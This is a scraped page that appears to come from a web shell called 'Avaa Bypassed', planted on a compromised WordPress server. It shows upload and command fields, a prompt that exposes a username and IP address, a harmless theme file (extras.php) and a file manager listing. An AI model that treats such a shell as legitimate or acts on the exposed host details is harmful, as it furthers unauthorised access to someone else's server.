[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@13.58.32.115: ~ $
<?php
/**
 * Custom functions that act independently of the theme templates
 *
 * Eventually, some of the functionality here could be replaced by core features
 *
 * @package Tutor
 */

/**
 * Adds custom classes to the array of body classes.
 */
function tutor_body_classes( $classes ) {
	// Adds a class of group-blog to blogs with more than 1 published author
	if ( is_multi_author() ) {
		$classes[] = 'group-blog';
	}

	return $classes;
}
add_filter( 'body_class', 'tutor_body_classes' );

Filemanager

Name Type Size Permission Actions
custom-header.php File 1.47 KB 0644
customizer.php File 11.1 KB 0644
extras.php File 515 B 0644
template-tags.php File 1.56 KB 0644